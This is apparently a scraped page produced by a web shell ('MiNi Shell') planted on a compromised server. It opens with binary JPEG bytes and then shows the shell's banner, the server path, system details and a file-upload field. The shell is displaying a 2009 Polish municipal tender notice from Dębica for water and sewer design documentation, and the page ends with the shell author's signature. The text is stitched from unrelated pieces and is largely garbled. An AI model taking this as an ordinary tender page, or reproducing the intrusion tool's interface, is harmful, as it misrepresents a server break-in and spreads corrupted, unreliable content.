JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/7662-N-2009.html

<p class="kh_header"><b>Dębica: Opracowanie kompleksowej dokumentacji budowlano-wykonawczej zespołu projektów pn. 
ROZBUDOWA  ISTNIEJĄCEJ  INFRASTRUKTURY  WODNO- KANALIZACYJNEJ w Gminie Dębica.</b><br>
<b>Numer ogłoszenia: 7662 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803324, 6803310, faks 014 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej dokumentacji budowlano-wykonawczej zespołu projektów pn. 
ROZBUDOWA  ISTNIEJĄCEJ  INFRASTRUKTURY  WODNO- KANALIZACYJNEJ w Gminie Dębica..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  usługa   : 
Opracowanie kompleksowej dokumentacji budowlano-wykonawczej zespołu projektów pn. ROZBUDOWA  ISTNIEJĄCEJ  INFRASTRUKTURY  WODNO- KANALIZACYJNEJ w Gminie Dębica .

Wymagane jest wykonanie 8 odrębnych dokumentacji projektowych wg zadań określonych w pkt.2.1 SIWZ
2.1.  Opis przedmiotu zamówienia : 

Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji budowlano-wykonawczej pn. -Rozbudowa istniejącej infrastruktury wodno - kanalizacyjnej w Gminie Dębica-   wraz ze złożeniem wniosków  do właściwego organu administracji i uzyskanie pozytywnych  decyzji wymaganych prawem budowlanym.

Wymagane jest wykonanie 8 odrębnych dokumentacji projektowych. 

Rozbudowa istniejącej infrastruktury wodno -kanalizacyjnej obejmuje nw zadania:

1. Budowa odcinka sieci kanalizacyjnej do działki 1326-23 w Brzeźnicy:
     z  rur PVC dn 200 o  długości  ok. 70m

2. Budowa sieci kanalizacyjnej dla Osiedla -Pod lasem- w Nagawczynie
    z rur PVC dn  160 - 200  o  długości ok. 2 000 m  

3. Budowa sieci  kanalizacyjnej i wodociągowej - uzbrojenie terenów Brzeźnica 
    Kołowrotnia
    - sieć wodociągowa:  z rur  PE  90 - 110   o długości ok. 300 m
    - sieć kanalizacyjna:  z rur  PVC z rur   160 - 200    o długości ok. 300 m
        
4. Budowa sieci kanalizacyjnej i wodociągowej - uzbrojenie terenów Brzeźnica Osiedle   
    k. cmentarza 
    - sieć wodociągowa:  z rur  PE  90 - 110   o długości ok. 1 500 m
    - sieć kanalizacyjna:  z rur  PVC z rur   160 - 200    o długości ok. 1 300 m

5. Wykonanie oczyszczalni p.domowej dla P. Wcisło Stanisławy zam. Kędzierz 155
    dla trzech rodzin

6. Wykonanie odcinka sieci kanalizacyjnej  do działki   nr  168 w Latoszynie
    z rur PVC dn 200  o długości ok. 160 m

7. Uzbrojenie terenów przeznaczonych pod budownictwo mieszkaniowe w sieć  
     kanalizacyjną w m. Nagawczyna  -kryształy-
     z rur PVC 200 0 długości ok. 160 m

8. Uzbrojenie terenów przeznaczonych pod budownictwo mieszkaniowe w sieć  
    kanalizacyjną w m. Paszczyna 
    z rur PVC  dn  200   o długości  ok. 280 m

Obowiązkiem projektanta jest  uzyskanie  wszelkich  wymaganych prawem budowlanym uzgodnień i decyzji  w tym pozwoleń na budowę oraz praw do terenu poprzez spisanie  w imieniu Gminy umów z właścicielami działek przez które ma przechodzić sieć kanalizacyjna lub wodociągowa albo  ma być posadowione inne urządzenie związane z inwestycją np. przepompownie.

2.2.  Zakres zamówienia obejmuje:

1) Uzyskanie map do celów projektowych.
2) Wykonanie badań geotechnicznych w niezbędnym zakresie. 
3) Uzyskanie decyzji o środowiskowych uwarunkowaniach  oraz decyzji o ustaleniu lokalizacji inwestycji celu
     publicznego .
4) Uzyskanie prawomocnej decyzji pozwolenia na budowę
5) Opracowanie kompleksowej dokumentacji projektowej

 6) Opracowanie Projektu  wykonawczego  - powinien  on uwzględniać obowiązujące normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie decyzji o pozwoleniu na budowę opracowany zgodnie z przepisami Prawa budowlanego i spełniający wymagania rozporządzenia Ministra Infrastruktury z 02.09.2004r  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego -Dz.U. nr 202, poz. 2072- w ilości 5 egzemplarzy + wersja elektroniczna

7) Do obowiązków Wykonawcy wybranego w wyniku rozstrzygnięcia procedury przetargowej należy złożenie projektu z wnioskiem o wydanie decyzji pozwolenia na budowę do właściwego organu administracji na podstawie stosownego upoważnienia oraz pozyskanie tej decyzji.
Pokrycie kosztów niezbędnych uzgodnień tj. wykonania niezbędnych map, wypisów z rejestru gruntów, decyzji o ustaleniu lokalizacji inwestycji celu publicznego należy do Wykonawcy.
Wykonawca opracuje projekty wykonawcze obejmujące:
wszystkie konieczne branże obejmujące wymagane szczegóły w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania dokumentów dla sporządzenia oferty przez przyszłego wykonawcę robót budowlanych. Projekty te muszą uwzględniać wymagania określone w par. 5 rozporządzenia Ministra Infrastruktury 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego -Dz.U. z 2004r nr 202, poz. 2072- w ilości po 5 egz. + wersja elektroniczna

8) Specyfikacje Techniczne Wykonania i Odbioru Robót zgodnie z Rozporządzeniem jw. - 4 egzemplarze + wersja elektroniczna

9) Kosztorysy inwestorskie - opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym -Dz.U. Nr 130 poz. 1389- wraz z zestawieniem zbiorczym tych kosztorysów  - po 2 egzemplarze + wersja elektroniczna

10) Przedmiary robót przez które należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych. Przedmiary muszą uwzględniać wymagania określone w par. 6-10 Rozporządzenia Ministra Infrastruktury z 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego w ilości po 2 egz. + wersja elektroniczna.

11) Wersję elektroniczną projektu wykonawczego, specyfikacji technicznych wykonania i odbioru robót oraz kosztorysami i przedmiarami robót, informację bioz /w formacie zaimportowanym do plików PDF oraz w formacie w jakim były one tworzone roboczo/. 

12) Informację dot. bezpieczeństwa i ochrony zdrowia -BIOZ- i wersja elektroniczna.
Projekt powinien uwzględniać współczesne rozwiązania techniczne stosowane w tej dziedzinie.


13) Termin realizacji zamówienia:  określa ostateczny czas złożenia przez Wykonawcę kompletu dokumentacji projektowej do  właściwego organu administracyjnego  -na podstawie upoważnienia Zamawiającego- z wnioskiem o wydanie Decyzji pozwolenia na budowę -potwierdzoną kopię wniosku należy przekazać Zamawiającemu- oraz przekazania Zamawiającemu pozostałych 2 egz. Dokumentacji wykonawczej wraz z kosztorysami, przedmiarami, planem BIOZ, STWiOR, wersjami elektronicznymi itp. 
Ustala się termin wykonania całości prac:  4 m-ce od uzyskania prawomocnej decyzji o lokalizacji inwestycji celu publicznego -  nie później niż do dnia 20.12.2009 r.

14)  Opisywany przedmiot  zamówienia - dokumentacja projektowa musi być zgodna z ustawą Prawo zamówień publicznych ( w szczególności art.29,30 i 31),oraz przepisami  wykonawczymi do tej ustawy - tak, aby na jej podstawie  zamawiający - Gmina Dębica mógł   przeprowadzić wymagany przepisami prawa (ustawa Pzp) przetarg nieograniczony na roboty budowlane. 

15) Wszystkie rozwiązania muszą być uzgodnione z Inwestorem przed przystąpieniem do końcowej fazy prac projektowych. 
b)  Wskazane jest dokonanie wizji lokalnej miejsca realizacji przedmiotu zamówienia.
c) Osobą upoważnioną ze strony Zamawiającego w sprawie uzgodnienia z Wykonawcami terminu i sposobu przeprowadzenia wizji lokalnej Pani Maria Kłósek - Inspektor w Wydziale Infrastruktury Technicznej, Inwestycji i Remontów w Urzędzie Gminy w Dębicy. 

16)  Nadzór autorski w trakcie realizacji inwestycji  przez Zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.22.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.  WARUNKI  UDZIAŁU W POSTĘPOWANIU   ORAZ  SPOSÓB  OCENY   ICH SPEŁNIANIA
O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy :
1) Posiadają uprawnienia  do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

  2) Posiadają  niezbędną  wiedzę  i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi
      do wykonania zamówienia  lub  przedstawią pisemne zobowiązanie innych podmiotów do udostępniania
      potencjału  technicznego i osób zdolnych do wykonania zamówienia.

a)  Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał   minimum 1 usługę odpowiadającą swoim rodzajem i wartością usłudze  stanowiącej  przedmiot zamówienia (dokumentacje projektowe sieci kanalizacyjnych  i wodociągowych), z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców. Wymagane jest wykazanie co najmniej 1 usługi projektowej  o wartości min. 30 000,00 zł brutto  oraz załączenie dokumentów potwierdzających, że usługa ta została wykonana należycie ,
b) Wykonawca musi  wykazać, że w wykonaniu zamówienia będą uczestniczyć osoby z uprawnieniami bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie projektowania  w  specjalności : instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych - Załącznik nr 4 do SIWZ,  lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia .
 c) wykonawca musi  wykazać, że osoby , które będą uczestniczyć w wykonywaniu zamówienia , posiadają wymagane uprawnienia budowlane bez ograniczeń  w zakresie projektowania w  specjalności
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,
 wodociągowych,   kanalizacyjnych 
-oraz posiadają wpis na listę członków odpowiedniej  Izby samorządu zawodowego  i są ubezpieczone  od odpowiedzialności cywilnej.

3) Znajdują  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

  4) Niepodlegają  wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków podmiotowych udziału w postępowaniu nastąpi na podstawie:
1)	złożonych oświadczeń (w zakresie art. 22 ust. 1 i  art. 24 ust. 1 ustawy Pzp ), 
2)	dokumentów potwierdzających spełnianie tych warunków - 
        - metodą: -spełnia / nie spełnia

6.  WYMAGANIA PRZEDMIOTOWE ORAZ SPOSÓB OCENY ICH SPEŁNIANIA
1. Wykonanie przedmiotu zamówienia musi być zgodne z opisem przedmiotu zamówienia zawartym w SIWZ  pkt. 2 
2.Ponieważ przedmiot zamówienia (dokumentacja projektowa-techniczno wykonawcza) będzie służył Zamawiającemu jako opis przedmiotu zamówienia  na roboty budowlane - zamawiający wymaga aby był wykonany zgodnie z ustawą Prawo zamówień publicznych w szczególności z zapisami art. 29 i 30. Szczegółowe warunki  zgodności  przedmiotu zamówienia  z ustawą Pzp zawarte są w wzorze umowy § 1 - Zakres zamówienia ppkt.12.
3. Oferta musi zagwarantować:
a)  termin realizacji zamówienia - :  4 m-ce od uzyskania prawomocnej decyzji o lokalizacji inwestycji celu publicznego -  nie później niż do dnia 20.12.2009 r
b)płatność za wykonanie przedmiotu umowy  nastąpi zgodnie z harmonogramem  i na warunkach określonych w umowie,
c) termin płatności wynosi 7 dni od daty wpływu faktury do siedziby Zamawiającego.
d) minimum  48 miesięcy   pełnej gwarancji na wykonany przedmiot zamówienia,
e) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji.

Ocena spełniania  wymagań  przedmiotowych nastąpi na podstawie złożonych oświadczeń i dokumentów potwierdzających spełnianie tych wymagań metodą :  spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5. WYKAZ   DOKUMENTÓW  I  OŚWIADCZEŃ ,  JAKIE  MAJĄ   DOSTARCZYĆ   WYKONAWCY  NA POTWIERDZENIE   SPEŁNIANIA   WARUNKÓW   UDZIAŁU   W   POSTĘPOWANIU
5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.2. Oświadczenie w zakresie art. 24 ust. 1 ustawy Pzp. - Załącznik nr   1 do SIWZ.
5.3. Oświadczenie w zakresie art. 22 ust. 1 ustawy Pzp.-  Załącznik  nr  2 do SIWZ.
5.4 Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.  Wymagane jest wykazanie co najmniej 1 usługi projektowej  o wartości min. 30 000,00 zł  brutto  - Załącznik nr 3 do SIWZ
 5.5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - Załącznik nr 4 do SIWZ ,
5.5. a) - jeżeli w wykazie o którym mowa w ppkt.5.5 Wykonawca wskazał osoby, którymi będzie dysponował,  Zamawiający żąda złożenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
5.6. Dokumenty stwierdzające, ze osoby  które będą uczestniczyć w wykonaniu zamówienia i pełnić samodzielną funkcję techniczną w budownictwie  posiadają  wymagane uprawnienia budowlane bez ograniczeń w zakresie projektowania w specjalności: 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych,   kanalizacyjnych ,
-oraz posiadają wpis na listę członków odpowiedniej Izby samorządu zawodowego  i są  ubezpieczone od odpowiedzialności cywilnej, co daje prawo do wykonywania samodzielnych  funkcji technicznych w budownictwie zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5, poz. 42 z 2001 r. z późn. zm.)

5.7. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej to :
 - zamiast dokumentu o którym mowa  w pkt. 5.1,  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający , że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 mieś. przed upływem  terminu składania ofert .
5.8.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,
nie wydaje się dokumentów, o których mowa w pkt. 5.7. SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.9. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane dokumenty wymienione w punkcie  5.1 , 5.2 , 5.3   muszą  być złożone  przez każdego z  wykonawców osobno.

6.  WYMAGANIA PRZEDMIOTOWE ORAZ SPOSÓB OCENY ICH SPEŁNIANIA
1. Wykonanie przedmiotu zamówienia musi być zgodne z opisem przedmiotu zamówienia zawartym w SIWZ  pkt. 2 
2.Ponieważ przedmiot zamówienia (dokumentacja projektowa-techniczno wykonawcza) będzie służył Zamawiającemu jako opis przedmiotu zamówienia  na roboty budowlane - zamawiający wymaga aby był wykonany zgodnie z ustawą Prawo zamówień publicznych w szczególności z zapisami art. 29 i 30. Szczegółowe warunki  zgodności  przedmiotu zamówienia  z ustawą Pzp zawarte są w wzorze umowy § 1 - Zakres zamówienia ppkt.12.
3. Oferta musi zagwarantować:
a)  termin realizacji zamówienia - :  4 m-ce od uzyskania prawomocnej decyzji o lokalizacji inwestycji celu publicznego -  nie później niż do dnia 20.12.2009 r
b)płatność za wykonanie przedmiotu umowy  nastąpi zgodnie z harmonogramem  i na warunkach określonych w umowie,
c) termin płatności wynosi 7 dni od daty wpływu faktury do siedziby Zamawiającego.
d) minimum  48 miesięcy   pełnej gwarancji na wykonany przedmiot zamówienia,
e) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji.

Ocena spełniania  wymagań  przedmiotowych nastąpi na podstawie złożonych oświadczeń i dokumentów potwierdzających spełnianie tych wymagań..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dębicy  pok.21
39-200 Dębica, ul.Batorego 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 09:00, miejsce: Urząd Gminy w Dębicy  - Sekretariat
39-200 Dębica, ul.Batorego 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com